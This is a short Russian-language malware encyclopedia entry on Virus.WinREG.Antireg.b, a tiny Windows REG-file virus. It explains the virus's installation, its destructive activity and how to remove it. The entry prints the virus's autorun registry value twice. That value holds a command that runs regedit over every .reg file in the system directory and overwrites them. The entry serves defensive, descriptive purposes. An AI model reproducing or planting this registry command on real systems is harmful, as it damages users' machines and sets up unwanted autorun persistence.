Virus.WinREG.Antireg.b

Материал из Total Malware Info

Перейти к: навигация, поиск

Virus.WinREG.Antireg.b Вирус. Является файлом реестра Windows (REG-файл). Имеет размер 214 байт.

Инсталляция

При импорте настроек реестра из файла вируса происходит создание ключа автозапуска: 

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run\]
"(default)"="command /c for %i in (%windir%\system\*.reg) do regedit /e %i HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"

Деструктивная активность

Вирус создает ключи автозапуска для всех файлов реестра, расположенных в системном каталоге Windows.

Рекомендации по удалению

  1. Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить значение ключа реестра:
    3. [HKLM\Software\Microsoft\Windows\CurrentVersion\Run\]
"(default)"="command /c for %i in (%windir%\system\*.reg) do regedit /e %i HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Источник — «http://www.totalmalwareinfo.com/rus/Virus.WinREG.Antireg.b»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.